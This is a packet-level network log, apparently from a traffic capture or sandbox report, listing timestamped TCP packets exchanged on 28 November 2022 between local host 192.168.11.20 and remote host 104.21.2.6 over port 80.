Nov 28, 2022 16:37:04.449038029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449049950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449060917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449074984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449091911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449105024 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449126005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449141026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449166059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449177027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449187040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449198008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449208975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449218035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449275017 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449275017 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449341059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449352980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449429035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449440956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449445009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449507952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449521065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449537039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449590921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449590921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449598074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449609995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449620962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449639082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449651003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449661970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449671984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449691057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449702978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449713945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449724913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449742079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449764013 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449768066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449779987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449810982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449821949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449834108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449851990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449865103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449876070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449879885 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.449887037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449906111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449932098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449943066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449954033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449965954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449976921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.449987888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.450001955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.450026989 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.450026989 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.450195074 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.450365067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.618186951 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.627141953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.627252102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.627265930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.627487898 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.627681017 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.636779070 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.645737886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.645857096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.645876884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.645905972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.645948887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.645962954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646007061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646023035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646038055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646049976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646060944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646075964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646106005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646125078 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646125078 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646137953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646151066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646178007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646193981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646205902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646219015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646231890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646246910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646259069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646284103 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646286964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646302938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646327972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646356106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646373034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646385908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646401882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646414042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646426916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646435976 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646439075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646457911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646471977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646483898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646498919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646527052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646557093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646570921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646596909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646625042 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646625042 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646629095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646641970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646657944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646686077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646697998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646728992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646742105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646754026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646770954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646775007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646784067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646796942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646811962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646826982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646840096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646852016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646871090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646883965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646895885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646908998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646924973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646938086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646944046 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646944046 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.646950960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646965027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646981001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.646994114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647006035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647021055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647034883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647047997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647059917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647078037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647094011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647106886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647114992 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647119999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647135973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647149086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647161007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647175074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647191048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647202969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647216082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647231102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647245884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647258997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647270918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647273064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647285938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647300005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647311926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647325039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647340059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647355080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647367954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647380114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647397995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647412062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647423983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647437096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647445917 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647455931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647469044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647481918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647496939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647512913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647526026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647537947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647557020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647571087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647583961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647598028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647614956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647615910 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647617102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647627115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647639990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647651911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647667885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647680044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647692919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647705078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647723913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647737980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647749901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647766113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647779942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647785902 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647792101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647804022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647820950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647835970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647849083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647861958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647881031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647893906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647906065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647921085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647934914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647947073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647958994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647959948 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647959948 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.647974968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.647990942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648004055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648015976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648029089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648045063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648056984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648083925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648099899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648112059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648143053 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.648179054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648226976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648292065 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.648335934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648350000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.648509026 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.648680925 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.657505989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657618046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657638073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657650948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657661915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657675028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657696962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657798052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657812119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657829046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657840967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657850027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.657876968 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.657876968 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.657984018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658014059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658046007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658046007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658123016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658135891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658148050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658164024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658175945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658195972 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658195972 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658202887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658220053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658231974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658334017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658346891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.658366919 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658366919 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658461094 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658629894 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.658926010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659058094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659152031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659154892 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.659167051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659199953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659213066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659231901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659245014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659257889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659270048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659282923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659295082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659327030 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.659327030 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.659327030 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.659495115 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.659543037 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.659873009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.659981966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660054922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660075903 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.660082102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660099030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660125017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660166979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660180092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660192966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660208941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660233974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660238028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.660238028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.660248041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660407066 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.660586119 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.660851955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.660999060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661012888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661036968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661072969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661087990 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.661169052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661184072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661199093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661211014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661221981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661252022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.661330938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661345005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661427975 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.661427975 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.661597013 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.661770105 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.661832094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661922932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661935091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661946058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661974907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661986113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.661997080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662013054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662024975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662035942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662180901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662183046 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.662183046 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.662193060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662354946 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.662522078 CET	49830	80	192.168.11.20	104.21.2.6
